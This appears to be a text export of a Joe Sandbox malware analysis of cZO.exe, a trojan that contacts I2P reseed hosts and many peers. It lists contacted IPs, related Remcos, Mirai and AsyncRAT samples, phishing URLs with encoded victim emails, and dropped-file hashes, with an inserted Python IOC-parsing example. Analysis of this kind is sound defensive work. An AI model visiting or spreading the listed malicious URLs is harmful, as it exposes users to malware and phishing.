                                                                                                            unknown
                                                                                                            http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd$svchost.exe, 0000001F.00000003.3183261030.000001D379308000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                              high
                                                                                                              http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsdAAsvchost.exe, 0000001F.00000003.3143580946.000001D37930F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3143291121.000001D37930E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3156389621.000001D379307000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3112272695.000001D37930E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3111493334.000001D37930E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3183931947.000001D37930F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3143546975.000001D37930E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000002.3263042958.000001D379310000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3156417903.000001D37930F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3111460681.000001D37930F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3183773272.000001D37930E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3184036782.000001D37930E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3130778572.000001D37930E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3111301830.000001D379307000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3111317881.000001D37930E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3183261030.000001D379308000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3183958551.000001D37930E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 
0000001F.00000003.3184178913.000001D37930E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3143745371.000001D37930F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3199403669.000001D37930E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3112006865.000001D37930E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                high
                                                                                                                https://i2p.ghativega.in/b.cmain.exe, 00000016.00000002.3155678668.00000223502E7000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000016.00000003.2471613149.00000223502F9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                • Avira URL Cloud: safe
                                                                                                                unknown
                                                                                                                https://login.microsoftonline.com/ppsecure/DeviceUpdate.srfsvchost.exe, 0000001F.00000002.3262495369.000001D378A46000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3023982986.000001D379363000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3023913746.000001D37934D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                  high
• No. of IPs < 25%
• 25% < No. of IPs < 50%
• 50% < No. of IPs < 75%
• 75% < No. of IPs
IP | Domain | Country | ASN | ASN Name | Malicious
87.209.87.178 | unknown | Netherlands | 13127 | VERSATELASfortheTrans-EuropeanTele2IPTransportbackbo | false
147.79.71.139 | unknown | United States | 208485 | EKSENBILISIMTR | false
24.57.10.130 | unknown | Canada | 7992 | COGECOWAVECA | false
31.3.152.100 | unknown | Sweden | 51430 | ALTUSNL | false
155.93.133.82 | unknown | South Africa | 37680 | COOL-IDEASZA | false
107.189.28.6 | unknown | United States | 53667 | PONYNETUS | true
                                                                                                                  23.137.249.66
                                                                                                                  unknownReserved
                                                                                                                  397614GTLAKESUSfalse
                                                                                                                  95.216.2.172
                                                                                                                  reseed.memcpy.ioGermany
                                                                                                                  24940HETZNER-ASDEtrue
                                                                                                                  36.37.69.163
                                                                                                                  unknownIndonesia
                                                                                                                  4800LINTASARTA-AS-APNetworkAccessProviderandInternetServicfalse
                                                                                                                  139.59.231.96
                                                                                                                  unknownSingapore
                                                                                                                  14061DIGITALOCEAN-ASNUSfalse
                                                                                                                  144.76.102.56
                                                                                                                  unknownGermany
                                                                                                                  24940HETZNER-ASDEfalse
                                                                                                                  123.215.14.113
                                                                                                                  unknownKorea Republic of
                                                                                                                  9318SKB-ASSKBroadbandCoLtdKRfalse
                                                                                                                  78.191.208.199
                                                                                                                  unknownTurkey
                                                                                                                  9121TTNETTRtrue
                                                                                                                  118.136.159.58
                                                                                                                  unknownIndonesia
                                                                                                                  23700FASTNET-AS-IDLinknet-FastnetASNIDfalse
                                                                                                                  47.221.95.89
                                                                                                                  unknownUnited States
                                                                                                                  19108SUDDENLINK-COMMUNICATIONSUSfalse
                                                                                                                  148.135.95.231
                                                                                                                  unknownSweden
                                                                                                                  158ERI-ASUSfalse
                                                                                                                  78.57.19.55
                                                                                                                  unknownLithuania
                                                                                                                  8764TELIA-LIETUVALTfalse
                                                                                                                  185.148.3.164
                                                                                                                  unknownFinland
                                                                                                                  203003MAGNA-CAPAXFIfalse
                                                                                                                  188.174.152.142
                                                                                                                  unknownGermany
                                                                                                                  8767MNET-ASGermanyDEfalse
                                                                                                                  194.54.156.174
                                                                                                                  unknownUkraine
                                                                                                                  8654CRIMEAINFOCOM-ASUAfalse
                                                                                                                  77.238.244.54
                                                                                                                  unknownRussian Federation
                                                                                                                  42429TELERU-ASRUfalse
                                                                                                                  120.24.253.140
                                                                                                                  unknownChina
                                                                                                                  37963CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtdfalse
                                                                                                                  84.52.93.26
                                                                                                                  unknownRussian Federation
                                                                                                                  25408WESTCALL-SPB-ASRUfalse
                                                                                                                  24.125.49.216
                                                                                                                  unknownUnited States
                                                                                                                  7922COMCAST-7922USfalse
                                                                                                                  2.155.132.51
                                                                                                                  unknownSpain
                                                                                                                  12430VODAFONE_ESESfalse
                                                                                                                  179.254.168.215
                                                                                                                  unknownBrazil
                                                                                                                  8167BrasilTelecomSA-FilialDistritoFederalBRfalse
                                                                                                                  45.200.148.158
                                                                                                                  unknownSeychelles
                                                                                                                  328608Africa-on-Cloud-ASZAfalse
                                                                                                                  92.39.210.213
                                                                                                                  unknownRussian Federation
                                                                                                                  39001MTSRUfalse
                                                                                                                  145.220.60.21
                                                                                                                  unknownNetherlands
                                                                                                                  1101IP-EEND-ASIP-EENDBVNLfalse
                                                                                                                  101.191.73.121
                                                                                                                  unknownAustralia
                                                                                                                  1221ASN-TELSTRATelstraCorporationLtdAUfalse
                                                                                                                  65.109.174.146
                                                                                                                  unknownUnited States
                                                                                                                  11022ALABANZA-BALTUSfalse
                                                                                                                  49.176.22.233
                                                                                                                  unknownAustralia
                                                                                                                  4804MPX-ASMicroplexPTYLTDAUfalse
                                                                                                                  50.37.113.212
                                                                                                                  unknownUnited States
                                                                                                                  27017ZIPLY-FIBER-LEGACY-ASNUSfalse
                                                                                                                  57.128.196.4
                                                                                                                  unknownBelgium
                                                                                                                  2686ATGS-MMD-ASUSfalse
                                                                                                                  95.158.36.98
                                                                                                                  unknownUkraine
                                                                                                                  35362BESTBestISPUAtrue
                                                                                                                  31.10.150.55
                                                                                                                  unknownSwitzerland
                                                                                                                  6830LIBERTYGLOBALLibertyGlobalformerlyUPCBroadbandHoldingfalse
                                                                                                                  73.110.171.77
                                                                                                                  unknownUnited States
                                                                                                                  7922COMCAST-7922USfalse
                                                                                                                  95.105.66.5
                                                                                                                  unknownRussian Federation
                                                                                                                  57128KGS-NETRUfalse
                                                                                                                  72.11.42.34
                                                                                                                  unknownUnited States
                                                                                                                  22709NSTELCOUSfalse
                                                                                                                  82.65.181.52
                                                                                                                  unknownFrance
                                                                                                                  12322PROXADFRfalse
                                                                                                                  71.246.18.247
                                                                                                                  unknownUnited States
                                                                                                                  701UUNETUSfalse
                                                                                                                  78.58.40.197
                                                                                                                  unknownLithuania
                                                                                                                  8764TELIA-LIETUVALTfalse
                                                                                                                  176.241.49.148
                                                                                                                  unknownHungary
                                                                                                                  20845DIGICABLEHUfalse
                                                                                                                  45.83.104.162
                                                                                                                  unknownGermany
                                                                                                                  197540NETCUP-ASnetcupGmbHDEfalse
                                                                                                                  67.2.9.136
                                                                                                                  unknownUnited States
                                                                                                                  209CENTURYLINK-US-LEGACY-QWESTUSfalse
                                                                                                                  208.113.128.162
                                                                                                                  unknownUnited States
                                                                                                                  26347DREAMHOST-ASUSfalse
                                                                                                                  128.140.43.40
                                                                                                                  unknownGermany
                                                                                                                  24940HETZNER-ASDEfalse
                                                                                                                  108.61.189.74
                                                                                                                  unknownUnited States
                                                                                                                  20473AS-CHOOPAUSfalse
                                                                                                                  193.233.193.76
                                                                                                                  unknownRussian Federation
                                                                                                                  2895FREE-NET-ASFREEnetEUfalse
                                                                                                                  198.74.48.115
                                                                                                                  unknownUnited States
                                                                                                                  63949LINODE-APLinodeLLCUSfalse
                                                                                                                  120.77.100.135
                                                                                                                  unknownChina
                                                                                                                  37963CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtdfalse
                                                                                                                  174.164.200.204
                                                                                                                  unknownUnited States
                                                                                                                  7922COMCAST-7922USfalse
                                                                                                                  68.183.196.133
                                                                                                                  reseed.i2pgit.orgUnited States
                                                                                                                  14061DIGITALOCEAN-ASNUStrue
                                                                                                                  46.142.175.43
                                                                                                                  unknownGermany
                                                                                                                  8881VERSATELDEfalse
                                                                                                                  69.10.220.235
                                                                                                                  unknownUnited States
                                                                                                                  20394MASHELL-TELECOMUStrue
                                                                                                                  213.108.251.66
                                                                                                                  unknownRussian Federation
                                                                                                                  49834BESTHOSTINGRUfalse
                                                                                                                  178.175.134.3
                                                                                                                  unknownMoldova Republic of
                                                                                                                  43289TRABIAMDfalse
                                                                                                                  185.226.181.238
                                                                                                                  reseed-pl.i2pd.xyzSpain
                                                                                                                  197518RACKMARKTEStrue
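The contact table above is the raw material for IOC extraction, and in a plain-text export of the report each row arrives as three fused lines (the IP; the domain run together with the country; the ASN number run together with the ASN name and the true/false malicious flag). The Python below is an added example, not part of the Joe Sandbox report or its tooling: it parses rows in either that fused form or a pipe-delimited form, collects the contacts the report flags as malicious as IOCs, and measures how many distinct countries and ASNs the sample touched. The sample rows are a constructed subset copied from this table; the regexes, the Contact record and the function names are this example's own assumptions.

```python
from __future__ import annotations

import re
from collections import Counter
from dataclasses import dataclass


@dataclass(frozen=True)
class Contact:
    """One row of the sandbox contact table (field names are this example's own)."""
    ip: str
    domain: str
    country: str
    asn: int
    asn_name: str
    malicious: bool


# Row layouts handled:
#  (a) pipe-delimited: "ip | domain | country | asn | asn_name | true/false"
#  (b) fused three-line text export:
#        line 1: "95.216.2.172"
#        line 2: "reseed.memcpy.ioGermany"      (domain + country, no separator)
#        line 3: "24940HETZNER-ASDEtrue"        (asn + asn name + malicious flag)
_IP = re.compile(r"^\d{1,3}(?:\.\d{1,3}){3}$")
# Domain is either the literal "unknown" or a hostname ending in a lowercase TLD;
# the country always starts with an uppercase letter, which is where the split falls.
_DOMAIN_COUNTRY = re.compile(r"^(unknown|[A-Za-z0-9.-]+?\.[a-z]{2,})([A-Z].*)$")
# Leading digits are the ASN, trailing true/false is the verdict, the rest is the name.
_ASN_NAME_FLAG = re.compile(r"^(\d+)(.*?)(true|false)$")


def parse_contacts(text: str) -> list[Contact]:
    """Parse contact rows from either layout; header, legend and unparseable lines are skipped."""
    lines = [ln.strip() for ln in text.splitlines() if ln.strip()]
    contacts: list[Contact] = []
    i = 0
    while i < len(lines):
        line = lines[i]
        if "|" in line:
            fields = [f.strip() for f in line.split("|")]
            if len(fields) == 6 and _IP.match(fields[0]) and fields[3].isdigit():
                ip, domain, country, asn, asn_name, flag = fields
                contacts.append(Contact(ip, domain, country, int(asn), asn_name, flag == "true"))
            i += 1
            continue
        if _IP.match(line) and i + 2 < len(lines):
            m_dc = _DOMAIN_COUNTRY.match(lines[i + 1])
            m_af = _ASN_NAME_FLAG.match(lines[i + 2])
            if m_dc and m_af:
                contacts.append(Contact(line, m_dc.group(1), m_dc.group(2),
                                        int(m_af.group(1)), m_af.group(2), m_af.group(3) == "true"))
                i += 3
                continue
        i += 1  # header line, legend text or a row we cannot parse: skip it
    return contacts


def malicious_iocs(contacts: list[Contact]) -> dict[str, list[str]]:
    """IPs and resolved hostnames the sandbox marked malicious, deduplicated and sorted."""
    ips = sorted({c.ip for c in contacts if c.malicious})
    domains = sorted({c.domain for c in contacts if c.malicious and c.domain != "unknown"})
    return {"ips": ips, "domains": domains}


def fan_out(contacts: list[Contact]) -> dict:
    """How widely the sample reached: distinct countries and ASNs plus the busiest ASN names."""
    return {
        "contacts": len(contacts),
        "countries": len({c.country for c in contacts}),
        "asns": len({c.asn for c in contacts}),
        "top_asns": Counter(c.asn_name for c in contacts).most_common(3),
    }


# Constructed input: a subset of this report's table, five rows in the fused
# three-line export layout and one row in the pipe-delimited layout.
SAMPLE = """\
IPDomainCountryFlagASNASN NameMalicious
107.189.28.6
unknownUnited States
53667PONYNETUStrue
95.216.2.172
reseed.memcpy.ioGermany
24940HETZNER-ASDEtrue
144.76.102.56
unknownGermany
24940HETZNER-ASDEfalse
68.183.196.133
reseed.i2pgit.orgUnited States
14061DIGITALOCEAN-ASNUStrue
123.215.14.113
unknownKorea Republic of
9318SKB-ASSKBroadbandCoLtdKRfalse
185.226.181.238 | reseed-pl.i2pd.xyz | Spain | 197518 | RACKMARKTES | true
"""

if __name__ == "__main__":
    rows = parse_contacts(SAMPLE)
    for r in rows:
        print(r)
    print(malicious_iocs(rows))
    print(fan_out(rows))
```

The malicious column is the sandbox's per-contact verdict, not a property of the address, so the extracted set is a starting point for triage rather than a finished blocklist; most rows in the full table sit in residential or commodity-hosting ASNs and are flagged false, and the fan-out numbers are what distinguish an overlay-network client that first reaches reseed hosts and then many peers from a sample with one or two fixed command-and-control servers.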
                                                                                                                  IP
                                                                                                                  127.0.0.1
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1584500
Start date and time: 2025-01-05 17:48:06 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 9m 26s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 33
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: cZO.exe
Detection: MAL
Classification: mal100.troj.evad.winEXE@46/72@4/59
EGA Information:
• Successful, ratio: 66.7%
HCA Information: Failed
Cookbook Comments:
• Found application associated with file extension: .exe
• Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, WmiPrvSE.exe
• Excluded IPs from analysis (whitelisted): 4.175.87.197, 20.3.187.198, 52.165.164.15, 40.126.32.74, 20.190.160.17, 40.126.32.133, 40.126.32.136, 20.190.160.22, 20.190.160.20, 40.126.32.138, 40.126.32.76, 20.189.173.21, 13.107.246.45
• Excluded domains from analysis (whitelisted): prdv4a.aadg.msidentity.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, www.tm.v4.a.prd.aadg.akadns.net, ctldl.windowsupdate.com, login.msa.msidentity.com, fe3cr.delivery.mp.microsoft.com, fe3.delivery.mp.microsoft.com, ocsp.digicert.com, login.live.com, glb.cws.prod.dcat.dsp.trafficmanager.net, blobcollector.events.data.trafficmanager.net, sls.update.microsoft.com, onedsblobprdwus16.westus.cloudapp.azure.com, umwatson.events.data.microsoft.com, wu-b-net.trafficmanager.net, glb.sls.prod.dcat.dsp.trafficmanager.net, www.tm.lg.prod.aadmsa.trafficmanager.net
• Execution Graph export aborted for target cZO.exe, PID 7128 because there are no executed functions
• Execution Graph export aborted for target shdpeqdz2a54sj46ur0.exe, PID 7088 because it is empty
• Not all processes were analyzed; the report is missing behavior information
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size exceeded maximum capacity and may have missing disassembly code.
• Report size exceeded maximum capacity and may have missing network information.
• Report size getting too big, too many NtCreateKey calls found.
• Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Time | Type | Description
11:48:57 | API Interceptor | 155x Sleep call for process: cZO.exe modified
11:48:59 | API Interceptor | 39x Sleep call for process: powershell.exe modified
11:50:15 | API Interceptor | 5149x Sleep call for process: main.exe modified
11:50:48 | API Interceptor | 1x Sleep call for process: WerFault.exe modified
Match          | Associated Sample Name / URL        | Detection | Threat Name
23.137.249.66  | file.exe                            | malicious | Unknown
95.216.2.172   | file.exe                            | malicious | Unknown
194.54.156.174 | DF2.exe                             | malicious | Unknown
31.3.152.100   | ZJYhnDLhwa.exe                      | malicious | Remcos
               | ZfigYV6HXd.exe                      | malicious | Remcos
               | g4E1F7Lc2O.exe                      | malicious | Remcos
               | yVhvGnsUpL.exe                      | malicious | Remcos
               | BoFA_Remittance Advice_21219.xlsm   | malicious | Remcos DBatLoader
               | IQl00lxPjo.exe                      | malicious | Remcos
Match                       | Associated Sample Name / URL                          | Detection | Threat Name              | Context
reseed.i2pgit.org           | DF2.exe                                               | malicious | Unknown                  | 68.183.196.133
reseed.memcpy.io            | file.exe                                              | malicious | Unknown                  | 95.216.2.172
bg.microsoft.map.fastly.net | jaTDEkWCbs.exe                                        | malicious | Quasar                   | 199.232.210.172
                            | 3LcZO15oTC.exe                                        | malicious | Unknown                  | 199.232.210.172
                            | N5kEzgUBn6.exe                                        | malicious | CobaltStrike, Metasploit | 199.232.214.172
                            | Tax_Refund_Claim_2024_Australian_Taxation_Office.js   | malicious | Remcos                   | 199.232.214.172
                            | N5kEzgUBn6.exe                                        | malicious | CobaltStrike, Metasploit | 199.232.210.172
                            | setup64v9.3.4.msi                                     | malicious | Unknown                  | 199.232.210.172
                            | KpHYfxnJs6.exe                                        | malicious | Blank Grabber            | 199.232.210.172
                            | c2.hta                                                | malicious | Remcos                   | 199.232.214.172
                            | phishingtest.eml                                      | malicious | Unknown                  | 199.232.214.172
                            | a36r7SLgH7.exe                                        | malicious | AsyncRAT                 | 199.232.214.172
Match | Associated Sample Name / URL | Detection | Threat Name | Context
VERSATELASfortheTrans-EuropeanTele2IPTransportbackbo | z0r0.i686.elf | malicious | Mirai | 62.58.31.151
 | 3.elf | malicious | Unknown | 82.174.140.190
 | kwari.mpsl.elf | malicious | Unknown | 143.185.252.107
 | botx.arm7.elf | malicious | Mirai | 87.208.168.138
 | loligang.spc.elf | malicious | Mirai | 87.208.130.132
 | armv5l.elf | malicious | Unknown | 62.59.121.44
 | nabarm.elf | malicious | Unknown | 87.215.239.164
 | nklspc.elf | malicious | Unknown | 87.208.121.121
 | jklmips.elf | malicious | Unknown | 87.212.252.199
 | armv6l.elf | malicious | Unknown | 143.186.106.176
EKSENBILISIMTR | https://google.co.ve/url?6q=emgjbxlJLi6z73yh&rct=tTPvvq6xRyj7Y00xDjnlx9kIjusucT&sa=t&url=amp/s%2fsoftilac.com.tr%2f7yoya/jiehcuo2ndtn1/ZHRob3JuZUBpa2FzZ3JvdXAuY29t%C3%A3%E2%82%AC%E2%80%9A$$$%C3%A3%E2%82%AC%E2%80%9A | malicious | HTMLPhisher | 45.143.99.90
 | https://linktr.ee/priyanka662 | malicious | Gabagool | 147.79.74.176
 | https://pub-a652f10bc7cf485fb3baac4a6358c931.r2.dev/dreyflex.html | malicious | Gabagool | 147.79.74.176
 | Iamgold-PYMPATA Policy_Enrollment2024739441.rtf | malicious | Unknown | 147.79.74.176
 | https://linklock.titanhq.com/analyse?url=https%3A%2F%2Fmyarrowleaf1-my.sharepoint.com%2F%3Af%3A%2Fg%2Fpersonal%2Fmarge_penrod_myarrowleaf_org%2FElQV40bjfBZKivPSKIPxGuYBa20TAVuQG9ya4YrQRKjHiQ%3Fe%3D7nML8f&data=eJxVzctugzAQBdCvMbtGBqOkWXhBlOYhUiW0VaR0gyZgGyL80Ng05e8L6aaVZlZz7p2Kz5PlPI1BxBQqFtW8qkF14P2ssjrSfEEPxukjHONsHXlusRboSUrN_aG0VA-IPFyxVU0QOB7_dfS8CcF5wjKSbMbRAyDaeydAxk96mPkGUDjbmjDxybBM_mo1rhv_WQPdlARUonTCoK3LPzWlxUm-dMU5pdebXH3m7dfpPd-fvrf9ZQUJ_cjOfbFdDpBesHjLb7u2IGwjCFsvzOvhWf4A0NhYxQ%25%25 | malicious | Unknown | 147.79.74.176
 | scan3762399_arleen@wcctxlaw.com.pdf | malicious | Unknown | 147.79.74.176
 | QeTCfhacvf.exe | malicious | Orcus | 45.10.151.182
 | ACTION REQUIRED Revised Billing #NL992-071 From Robinson Aviation Inc.msg | malicious | Unknown | 147.79.74.176
 | xxTupY4Fr3.xlsx | malicious | Unknown | 147.79.119.141
 | https://averellharriman.sharefile.com/public/share/web-s3b96c17360cd43e7bdcaf25a23709fd0 | malicious | Unknown | 147.79.74.176
COGECOWAVECA | fuckunix.mips.elf | malicious | Mirai | 72.38.100.18
 | armv5l.elf | malicious | Mirai | 24.150.83.227
 | mips.elf | malicious | Mirai, Moobot | 24.146.42.207
 | sh4.elf | malicious | Mirai, Moobot | 67.193.39.24
 | nklarm5.elf | malicious | Unknown | 72.38.18.85
 | arm7.elf | malicious | Mirai | 67.193.241.92
 | nshkppc.elf | malicious | Mirai | 24.150.27.115
 | la.bot.arm5.elf | malicious | Mirai | 24.57.77.99
 | la.bot.mips.elf | malicious | Mirai | 24.55.242.244
 | arm.elf | malicious | Mirai, Moobot | 192.69.236.66
ALTUSNL | .jmhgeojeri.elf | malicious | Unknown | 37.46.126.216
 | 7jBzTH9FXQ.exe | malicious | Unknown | 37.46.117.34
 | fACYdCvub8.exe | malicious | Unknown | 37.46.119.36
 | 7jBzTH9FXQ.exe | malicious | Unknown | 37.46.117.21
 | https://www.google.co.uk/url?q=38pQvvq6xRyj7Y00xDjnlx9kIHOSozurMOiaAkImPuQJnOIWtJjqJLi6stjtDz3yh&rct=tTPSrMOiaAkImPuQJnOIWtJjqJLi6stjtFX08pQvvq6xRyj7Y00xDjnlx9kIjusucT&sa=t&url=amp%2Fwe4uproducts.com/cbb/lld/jjg/5BVvnI7cfJ4HfuhWZvVda7dK/am9yZGFuLmJsYWNrQGxlYXJmaWVsZC5jb20= | malicious | Unknown | 213.5.71.85
 | file.exe | malicious | Unknown | 79.142.69.160
 | https://www.ccjm.org/highwire_log/share/mendeley?link=https://onpro.info | malicious | Unknown | 213.5.70.137
 | http://www.tellthedream.com/wpp-adobe/adobe.php | malicious | Unknown | 213.5.70.137
 | sVfXReO3QI.exe | malicious | Unknown | 37.46.119.50
 | http://merakibay.co.uk/wp-includes/merakibay/10pdf/wp-page202/pdfzipfilemailpagejkkgenhtdriyryhdej.html | malicious | HTMLPhisher | 213.5.71.85
No context

Match                                                                        | Associated Sample Name / URL | Detection | Threat Name
C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\evtsrv.dll   | DF2.exe                      | malicious | Unknown
                                                                             | ET5.exe                      | malicious | Unknown
C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\cnccli.dll   | DF2.exe                      | malicious | Unknown
                                                                             | ET5.exe                      | malicious | Unknown
C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\dwlmgr.dll   | DF2.exe                      | malicious | Unknown
                                                                             | ET5.exe                      | malicious | Unknown
Process: C:\Windows\System32\WerFault.exe
File Type: Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category: dropped
Size (bytes): 65536
Entropy (8bit): 0.9807208625347982
Encrypted: false
SSDEEP: 192:Ld3m6Q/d0MALS36j1TEzuiFcJZ24lO8l:Bm1/eMALXj1ozuiFcJY4lO8l
MD5: A4230802BDFCD187DBD5A5AC81982196
SHA1: F1CD46D4048EF13D913F69465BAFC8A7C4CA1A17
SHA-256: 8B4FCA86B22A6D8F60EEB574A632F12AB215966FE1FF3FA27E6C9B317BA07DD0
SHA-512: 54C861C11691B8643186D1D00BED7764733119C7D546CF82026AE3AFAB4FE4D4BF4FC83E964A9B3B688C29F0F84A74D71F0524562FD3169508E17423FDD98458
Malicious: true
Preview (UTF-16 decoded, truncated as in the report):
  Version=1
  EventType=APPCRASH
  EventTime=133805694345326213
  ReportType=2
  Consent=1
  UploadTime=133805694357044889
  ReportStatus=524384
  ReportIdentifier=44ed98c1-fa7d-497f-b5ef-71a509acd2a0
  IntegratorReportIdentifier=5c53e9f9-08ab-4d43-b4c5-fefed93e59bd
  Wow64Host=34404
  NsAppName=main.exe
  AppSessionGuid=0000197c-0000-0014-e5c2-b0ce915fdb01
  TargetAppId=W:00060318d4310657e8368557f183e15c47cd0000ffff!0000bdb8961f8afb999aece60bf1ef3e49e8e2349f7b!main.exe
  TargetAppVer=1970//01//01:00:00:00!19

Process: C:\Windows\System32\WerFault.exe
File Type: Mini DuMP crash report, 15 streams, Sun Jan 5 16:50:34 2025, 0x1205a4 type
Category: dropped
Size (bytes): 636854
Entropy (8bit): 1.0036505838068654
Encrypted: false
SSDEEP: 1536:qSC5cq+GwguFtH+Exz2j9nZJo9FPMWp//Na2hQOFLI0:efE/BQO
MD5: A1A600A99E372941548F05089B61875C
SHA1: BD55A72E3B5CBEE973A54FE41F58D78D1F24FF47
SHA-256: CAC0839E32428A22C3AA4D1FA5F2DB1655CCF2A8FFDD1E55D6929AF3134B4D67
SHA-512: 14C49C15A5E2DE417D125305C1696ACAC25E3207EDD2D0AB612DFFDBE6516CE8D368BDC33D906F6EDBE09F90457B80BE4A4A4419EBA3142FC9C95CD3A346D85A
Malicious: false
                                                                                                                                                Preview:MDMP..a..... .......Z.zg............$...........(...8...........` ..........h...........`.......8...........T............0..............\!..........H#..............................................................................eJ.......#......Lw......................T.......|...".zg.............................@..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................
Process: C:\Windows\System32\WerFault.exe
File Type: XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category: dropped
Size (bytes): 6734
Entropy (8bit): 3.718402035734142
Encrypted: false
SSDEEP: 96:RSIU6o7wVetb/Tv8nDYHV447Z5aM4UB89bfm1DbUfc+Vm:R6l7wVeJ/Tv4YHxprB89bfq8fzVm
MD5: CAF8C97EA4C67DEA614F449C39881061
SHA1: 8D9CF301497C6F4E4A98F2F70D994ACCFCD4E4E1
SHA-256: 5AC3C6DE5F457FACFF6D5074B4C838C3F267DE2C24F331352FFB8CE3E2F6FF70
SHA-512: 02FC9488AE29A9FD1367FEBA8717EBE6EEC8FFDACEE191CF76C6B53B45B5A8F67BF2501DA078440107366930CA9A86B96F3CA7DF5ED719516A65E55F6BA5BD22
Malicious: false
Preview (UTF-16 decoded, truncated as in the report):
  <?xml version="1.0" encoding="UTF-16"?>
  <WERReportMetadata>
    <OSVersionInformation>
      <WindowsNTVersion>10.0</WindowsNTVersion>
      <Build>19045</Build>
      <Product>(0x30): Windows 10 Pro</Product>
      <Edition>Professional</Edition>
      <BuildString>19041.2006.amd64fre.vb_release.191206-1406</BuildString>
      <Revision>2006</Revision>
      <Flavor>Multiprocessor Free</Flavor>
      <Architecture>X64</Architecture>
      <LCID>2057</LCID>
    </OSVersionInformation>
    <ProcessInformation>
      <Pid>6524</Pi

Process: C:\Windows\System32\WerFault.exe
File Type: XML 1.0 document, ASCII text, with CRLF line terminators
Category: dropped
Size (bytes): 4603
Entropy (8bit): 4.415755310291748
Encrypted: false
SSDEEP: 48:cvIwWl8zsWJg771I9TwWpW8VYnYm8M4JD2+AFT3yq85/3jD4hA3+Mpd:uIjfsI70J7VvJwIDIA3Zpd
MD5: 464C5FC160B531C4EC3073C31D0B7656
SHA1: 4C85C77C144EE4ACCDB956F053DD3E62F31F733E
SHA-256: EE94F3131555439EF542D06F14A3C961F8C7C58A80D9A88FAE4FC2EBC1273B9E
SHA-512: 2B3E484ECC1D4C6A85834440A04970CBCBB292F8209BF7FC6951CC49419F30B09A78356FAFFDA084F122F0A80C0340A4192E6ED7F9C6426E4856CB09B497ABCD
Malicious: false
Preview (truncated as in the report):
  <?xml version="1.0" encoding="UTF-8" standalone="yes"?>
  <req ver="2">
   <tlm>
   <src>
   <desc>
   <mach>
   <os>
   <arg nm="vermaj" val="10" />
   <arg nm="vermin" val="0" />
   <arg nm="verbld" val="19045" />
   <arg nm="vercsdbld" val="2006" />
   <arg nm="verqfe" val="2006" />
   <arg nm="csdbld" val="2006" />
   <arg nm="versp" val="0" />
   <arg nm="arch" val="9" />
   <arg nm="lcid" val="2057" />
   <arg nm="geoid" val="223" />
   <arg nm="sku" val="48" />
   <arg nm="domain" val="0" />
   <arg nm="prodsuite" val="256" />
   <arg nm="ntprodtype" val="1" />
   <arg nm="platid" val="2" />
   <arg nm="tmsi" val="662873" />
   <arg nm="osinsty" val="1" />
   <arg nm="iever" val="11.789.19041.0-11.0.1000" />
   <arg nm="portos" val="0" />
   <arg nm="ram" val="409
                                                                                                                                                Process:C:\Windows\System32\svchost.exe
